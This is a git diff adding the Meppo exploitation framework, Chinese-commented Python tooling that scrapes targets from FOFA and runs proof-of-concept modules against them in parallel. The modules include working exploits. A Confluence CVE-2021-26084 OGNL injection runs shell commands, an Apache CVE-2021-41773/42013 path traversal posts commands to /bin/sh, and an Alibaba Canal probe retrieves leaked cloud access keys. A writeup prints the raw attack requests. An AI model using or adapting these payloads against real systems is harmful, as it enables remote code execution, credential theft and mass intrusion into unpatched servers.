diff --git a/Config/config_api.py b/Config/config_api.py new file mode 100644 index 0000000..12c33d8 --- /dev/null +++ b/Config/config_api.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' + +######################################################################################################################## + +# Seek 配置信息 +FOFA_EAMIL='' +FOFA_API_KEY='' +# 300¥会员最高设置为100,1000¥会员最高设置为10000,但可能会很慢,自行调整 +FOFA_SIZE=3 + +######################################################################################################################## diff --git a/Config/config_banner.py b/Config/config_banner.py new file mode 100644 index 0000000..f3ecae1 --- /dev/null +++ b/Config/config_banner.py @@ -0,0 +1,53 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +import random + +from Moudle.Moudle_index import PAYLOAD_NUM, MOUDLE_NUM + +Version = 'V 1.0' +info = '\n\t\t漏洞利用框架 Meppo | By WingsSec | {}\n'.format(Version) +NUM='\t\t [ {} MOUDLES\t\t{} PAYLOADS ]'.format(str(MOUDLE_NUM).center(3),str(PAYLOAD_NUM).center(3)) + +banner1 = r''' + __ __ + | \/ | ___ _ __ _ __ ___ + | |\/| |/ _ \ '_ \| '_ \ / _ \ + | | | | __/ |_) | |_) | (_) | + |_| |_|\___| .__/| .__/ \___/ + |_| |_| +{}{}'''.format(info,NUM) + +banner2 = r''' + _____ + / \ ____ ______ ______ ____ + / \ / \_/ __ \\____ \\____ \ / _ \ +/ Y \ ___/| |_> > |_> > <_> ) +\____|__ /\___ > __/| __/ \____/ + \/ \/|__| |__| +{}{}'''.format(info,NUM) + +banner3 = r''' + __ ___ + / |/ /__ ____ ____ ____ + / /|_/ / _ \/ __ \/ __ \/ __ \ + / / / / __/ /_/ / /_/ / /_/ / +/_/ /_/\___/ .___/ .___/\____/ + /_/ /_/ +{}{}'''.format(info,NUM) + +bannerlist = [banner1, banner2, banner3] + + +def Banner(): + print(bannerlist[random.randrange(len(bannerlist))]) + + +if __name__ == '__main__': + Banner() diff --git a/Config/config_decorators.py b/Config/config_decorators.py new file mode 100644 index 0000000..7276e36 --- /dev/null +++ b/Config/config_decorators.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +import time +import csv + +#列表打印装饰器 +def Print_info(fun): + def work(*args,**kwargs): + res=fun(*args, **kwargs) + if res: + if isinstance(res, str): + print(res) + elif isinstance(res, list): + for i in res: + print(i.replace('\n','')) + else: + pass + return fun(*args, **kwargs) + return work + +# 结果导出装饰器 +# 保存文件类型为.rabbit,因为我不希望这个结果被记事本草率地打开, +# 因为可能会乱,/哭唧唧,推荐notepad++、SublimeText、VScode等。 + +def Save_info(fun): + def work(*args,**kwargs): + result=(fun(*args, **kwargs)) + if result: + timetoken = str(int(time.time())) + filename='Output/{}_result_{}.rabbit'.format(fun.__name__,timetoken) + for i in result: + try: + fw = open(filename, 'a') + fw.write(i.replace('\n','') + '\n') + fw.close() + except: + pass + print('结果已保存至:'+filename) + # return fun(*args, **kwargs) + return work + + + +def Save_Csv(fun): + def work(*args,**kwargs): + result=(fun(*args, **kwargs)) + if result: + timetoken = str(int(time.time())) + filename='Output/{}_result_{}.csv'.format(fun.__name__,timetoken) + + with open(filename, 'a') as f: + head = ['host','ip','port','country','city','server','title'] + writer = csv.writer(f) + # 写入一行数据 + writer.writerow(head) + # 写入多行数据 + for i in result: + writer.writerow(list(i.values())) + + print('结果已保存至:'+filename) + # return fun(*args, **kwargs) + return work \ No newline at end of file diff --git a/Config/config_logging.py b/Config/config_logging.py new file mode 100644 index 0000000..6fc1358 --- /dev/null +++ b/Config/config_logging.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' + +import logging + +logging.basicConfig(filename='Meppo.log', + format='%(asctime)s %(message)s', + filemode="a", level=logging.INFO) + +def loglog(log): + logging.info(log) + diff --git a/Config/config_port.py b/Config/config_port.py new file mode 100644 index 0000000..f706b27 --- /dev/null +++ b/Config/config_port.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' + + +# 协议默认字典配置 + +HTTP_PORT=['80'] +HTTPS_PORT=['443','8443'] \ No newline at end of file diff --git a/Config/config_requests.py b/Config/config_requests.py new file mode 100644 index 0000000..a1ddf35 --- /dev/null +++ b/Config/config_requests.py @@ -0,0 +1,78 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' + +# from fake_useragent import UserAgent +# +# # 实例化 UserAgent 类 +# ua = UserAgent(verify_ssl=False) +# +# # 通用headers配置 +# headers={"User-Agent":ua.random} +# +# if __name__ == '__main__': +# print(headers) + +import random + +ua=random.choice([ +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", +"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", +"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", +"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", +"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", +"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36", +"Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36", +"Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", +"Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", +"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17", +"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15", +"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"]) + +headers={"User-Agent":ua} + +if __name__ == '__main__': + print(headers) \ No newline at end of file diff --git a/Framework/console_attack.py b/Framework/console_attack.py new file mode 100644 index 0000000..2f1142a --- /dev/null +++ b/Framework/console_attack.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +import datetime +from multiprocessing import Pool, Manager +from Tools.ReBuild import get_payload +from Config.config_logging import loglog +from Moudle.Moudle_index import * + +def urlcheck(url): + if 'http' in url: + return url + else: + return ('http://'+str(url)) + +def get_urls(file): + f=open(file,'r') + r=f.readlines() + f.close() + res=[] + for i in r: + res.append(urlcheck(i).replace('\n','')) + return res + +def record_res(dic): + if dic: + res='['+datetime.datetime.now().strftime('%X')+'] ' + for key in dic: + value = dic[key] + res=res+str(key)+' : '+str(value)+'\t' + print(res) + loglog(res) + + +def pocs(target,moudle,q): + q.put(target) + return eval(moudle).poc(target) + +def poolmana(moudle,urls): + p = Pool(30) + q = Manager().Queue() + print('任务加载数量:'+str(len(urls))) + for i in urls: + p.apply_async(pocs, args=(i,moudle,q,),callback=record_res) + p.close() + p.join() + + +def run_poc(*args): + if len(args)==2: + if isinstance(args[1],str): + record_res(eval(args[0]).poc(urlcheck(args[1]))) + elif isinstance(args[1], list): + poolmana(args[0], args[1]) + +def run_moudle(*args): + if len(args)==2: + if isinstance(args[1],str): + for i in get_payload(args[0]): + record_res(eval(i[0]).poc(urlcheck(args[1]))) + elif isinstance(args[1], list): + for i in get_payload(args[0]): + poolmana(i[0], args[1]) + + +if __name__ == '__main__': + run_poc('zabbix_admin',"http://127.0.0.1") diff --git a/Framework/console_list.py b/Framework/console_list.py new file mode 100644 index 0000000..a1c1952 --- /dev/null +++ b/Framework/console_list.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +from Tools.ReBuild import get_moudle, get_payload + +def get_cn_number(char): + count = 0 + for item in char: + if 0x4E00 <= ord(item) <= 0x9FA5: + count += 1 + return count + +def moudle_list(): + list=get_moudle() + print('【Moudle List】'.center(30)) + print('================================') + for i in list: + print('--------------------------------') + print('|{}|'.format(i.center(30-get_cn_number(i)))) + print('================================') + + + +def payload_list(moudle): + list=get_payload(moudle) + print('【Payload List】'.center(110)) + print('==================================================================================================================') + print('|{}|{}|{}|'.format('Moudle'.center(20),'Payload'.center(30), 'Remark'.center(60))) + for i in list: + print('------------------------------------------------------------------------------------------------------------------') + print('|{}|{}|{}|'.format(moudle.center(20),i[0].center(30-get_cn_number(i[0])),i[1].center(60-get_cn_number(i[1])))) + print('==================================================================================================================') + + +def payload_list_all(): + print('【Payload List】'.center(110)) + print('==================================================================================================================') + print('|{}|{}|{}|'.format('Moudle'.center(20),'Payload'.center(30), 'Remark'.center(60))) + for i in get_moudle(): + list = get_payload(i) + + + for j in list: + print('------------------------------------------------------------------------------------------------------------------') + print('|{}|{}|{}|'.format(i.center(20-get_cn_number(i)),j[0].center(30-get_cn_number(j[0])),j[1].center(60-get_cn_number(j[1])))) + print('==================================================================================================================') + +if __name__ == '__main__': + payload_list_all() \ No newline at end of file diff --git a/Framework/console_main.py b/Framework/console_main.py new file mode 100644 index 0000000..b43d18f --- /dev/null +++ b/Framework/console_main.py @@ -0,0 +1,79 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ +''' +import argparse +from Framework import console_attack +from Seek import fofaapi +from Framework.console_attack import get_urls +from Framework.console_list import moudle_list, payload_list, payload_list_all +from Moudle.Moudle_index import * + + + +def Console(): + parser = argparse.ArgumentParser() + M_POC = parser.add_argument_group('漏洞检测模块') + M_SEEK = parser.add_argument_group('资产爬取模块') + +######################################################################################################################## + parser.add_argument("-l", dest='list',help="list",action='store_true') + parser.add_argument("-ll", dest='listall',help="list all",action='store_true') + parser.add_argument("-m", dest='moudle',help="moudle") + parser.add_argument("-u", dest='url',help="target url") + parser.add_argument("-f", dest='file',help="the file of target list") + + + #漏洞检测模块 + M_POC.add_argument("-poc", dest='poc',help="漏洞检测") + + + #资产爬取模块 + M_SEEK.add_argument("-fofa", dest='fofa',help="资产爬取") + M_SEEK.add_argument("-num", dest='num',help="资产数量") + + args = parser.parse_args() + +######################################################################################################################## + + if args.fofa: + if args.num and int(args.num) > 10000: + print("Num Don't > 10000 PLS~") + else: + fofaapi.run(args.fofa, 1000) + elif args.poc: + try: + if args.url: + console_attack.run_poc(args.poc, args.url) + elif args.file: + console_attack.run_poc(args.poc, get_urls(args.file)) + else: + print("Usage:\n\tpython Meppo.py -poc xxx -u http:xxx\n\tpython Meppo.py -poc xxx -f target.txt") + except: + print("Usage:\n\tpython Meppo.py -poc xxx -u http:xxx\n\tpython Meppo.py -poc xxx -f target.txt") + elif args.moudle: + try: + if args.list: + payload_list(args.moudle) + elif args.url: + console_attack.run_moudle(args.moudle, args.url) + elif args.file: + console_attack.run_moudle(args.moudle, get_urls(args.file)) + else: + print("Usage:\n\tpython Meppo.py -m -l\n\tpython Meppo.py -m xxx -u http:xxx\n\tpython Meppo.py -m -f target.txt") + except: + print("Usage:\n\tpython Meppo.py -m -l\n\tpython Meppo.py -m xxx -u http:xxx\n\tpython Meppo.py -m -f target.txt") + elif args.list: + moudle_list() + elif args.listall: + payload_list_all() + else: + print("Usage:\n\tStep 1: python Meppo.py -l\n\tStep 2: python Meppo.py -m xxx -l\n\tStep 3: python Meppo.py -m / -poc \n\t") + + +######################################################################################################################## diff --git a/Meppo.py b/Meppo.py new file mode 100644 index 0000000..561b513 --- /dev/null +++ b/Meppo.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +from time import sleep + +from Tools.ReBuild import Rebuild +Rebuild() + +sleep(1) + +from Config.config_banner import Banner +from Framework.console_main import Console + +if __name__ == '__main__': + Banner() + Console() diff --git a/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.md b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.md new file mode 100644 index 0000000..09f1379 --- /dev/null +++ b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.md @@ -0,0 +1,30 @@ +# Alibaba Canal config 云密钥信息泄露漏洞 + +## 漏洞描述 + +由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露 + +## 漏洞影响 + +> [!NOTE] +> +> Alibaba Canal + +## FOFA + +> [!NOTE] +> +> title="Canal Admin" + +## 漏洞复现 + +验证漏洞的Url为 + +``` +/api/v1/canal/config/1/0 +``` + +![image-20210827144737848](images/image-20210827144737848.png) + +其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器 + diff --git a/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.py b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.py new file mode 100644 index 0000000..93e979e --- /dev/null +++ b/Moudle/AlibabaCanal/Alibaba_Canal_Info_Leak.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME = 'Alibaba_Canal_Info_Leak' +AUTHOR = "JDQ" +REMARK = 'Alibaba Canal config 云密钥信息泄露漏洞' +FOFA_RULE = 'title="Canal Admin"' +###################################################### + + +def poc(target): + headers={ + "User-Agent":ua + } + try: + r = requests.get(target+"/api/v1/canal/config/1/0",headers=headers, verify=False) + if r.status_code == 200 and 'aliyun' in r.text: + return(r.text) + except : + pass + + + +if __name__ == '__main__': + poc("127.0.0.1") diff --git a/Moudle/AlibabaCanal/images/image-20210827144737848.png b/Moudle/AlibabaCanal/images/image-20210827144737848.png new file mode 100644 index 0000000..412a57e Binary files /dev/null and b/Moudle/AlibabaCanal/images/image-20210827144737848.png differ diff --git a/Moudle/Apache/CVE_2021_41773.md b/Moudle/Apache/CVE_2021_41773.md new file mode 100644 index 0000000..5afdfed --- /dev/null +++ b/Moudle/Apache/CVE_2021_41773.md @@ -0,0 +1,49 @@ +# 漏洞简述 + +Apache 中间件http服务存在目录穿越漏洞,如果文档根目录以外的文件不受`require all denied`保护,则攻击者可以访问这些文件。 + +![image](C:\Users\jie\Downloads\image.png) + +# 影响范围 + +2.4.49---CVE-2021-41773 + +2.4.50---CVE-2021-42013 + +# 漏洞复现 + +需要apahce开着mod_cgi,如下图 + +![img](https://cdn.nlark.com/yuque/0/2021/png/21923359/1633937873113-96d33f3b-0b70-4b2a-9170-80df1d93d0d9.png) + +POST包(2.4.49版本): + +```java +GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Content-Length: 7 + +echo;id +``` + +使用cgi,目录穿越到/bin/bash,可以执行bash命令,即可实现RCE; + +POST包(2.4.50版本): + +2.4.50版本的漏洞与2.4.49版本是一个位置,只是官方修复不严格,而出现的一次绕过,对比一下,发现是对.的URL编码中的2和e再次做了一次URL编码; + +**注:2.4.50版本暂未找到环境测试验证,网上流传的是用的这个poc,下方脚本中的2.4.50版本的部分也是未实际做验证** + +``` +GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Content-Length: 7 + +echo;id +``` + +# poc + +编写脚本时,遇到一个坑,用burp测试没有问题的poc,即URL部分,Python请求有问题,大概内容为Your browser sent a request that this server could not understand. ,最终一点点测试,用wireshark对请求抓包,发现是Python请求时,会自动先做一次URL解码,但却不对%25解码,所以就有了下面的poc,与上面burp的poc对比一下就明白了。 \ No newline at end of file diff --git a/Moudle/Apache/CVE_2021_41773.py b/Moudle/Apache/CVE_2021_41773.py new file mode 100644 index 0000000..a9bf84a --- /dev/null +++ b/Moudle/Apache/CVE_2021_41773.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME1='CVE-2021-41773' +NAME2='CVE-2021-42013' +AUTHOR="境心" +REMARK='Apache httpd 目录穿越漏洞' +FOFA_RULE='body="it works"' +###################################################### + +def poc(target): + result = {} + url = target+"/cgi-bin/" + res = requests.get(url, headers=headers, verify=False, timeout=5) + try: + banner = res.headers['server'] + except: + banner = "" + + data = "echo; id" + + if banner != "" and "Apache/2.4.49" in banner: + # target_url = url + ".%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" + # 坑点在这 + target_url = url + ".%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" + target_res = requests.post(target_url, headers=headers, data=data, verify=False, timeout=5) + if "uid" in target_res.text and "gid" in target_res.text and "groups" in target_res.text: + result['CVE'] = NAME1 + result['target_url'] = url + return result + if banner != "" and "Apache/2.4.50" in banner: + target_url = target + "/cgi-bin/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/.%%%33%32%%36%35/bin/sh" + target_res = requests.post(target_url, headers=headers, data=data, verify=False, timeout=5) + if "uid" in target_res.text and "gid" in target_res.text and "groups" in target_res.text: + result['CVE'] = NAME2 + result['target_url'] = url + return result + + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1:8080") \ No newline at end of file diff --git a/Moudle/Confluence/CVE_2021_26084.py b/Moudle/Confluence/CVE_2021_26084.py new file mode 100644 index 0000000..517b5dc --- /dev/null +++ b/Moudle/Confluence/CVE_2021_26084.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from bs4 import BeautifulSoup + + + +######################################################################################################################## +# 脚本信息 +NAME='CVE_2021_26084' +AUTHOR="Trans" +REMARK='Confluence OGNL注入RCE' +FOFA_RULE='' +######################################################################################################################## + +def poc(target): + + result={} + url = target + "/pages/createpage-entervariables.action?SpaceKey=x" + session = requests.Session() + + try: + cmd = "echo goodluckboy" + xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} + rawHTML = session.post(url, headers=headers, data=xpl_data) + + soup = BeautifulSoup(rawHTML.text, 'html.parser') + queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] + if 'goodluckboy' in queryStringValue: + result["target"] = target + result["poc"] = NAME + result["url"] = url + return + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("127.0.0.1") \ No newline at end of file diff --git a/Moudle/Demo/Demo.py b/Moudle/Demo/Demo.py new file mode 100644 index 0000000..73cf3fa --- /dev/null +++ b/Moudle/Demo/Demo.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers + +requests.packages.urllib3.disable_warnings() + + +######################################################################################################################## +# 脚本信息 +NAME='Demo' +AUTHOR="RabbitMask" +REMARK='robots.txt敏感信息泄露' +FOFA_RULE='对应漏洞框架的fofa语法' +######################################################################################################################## 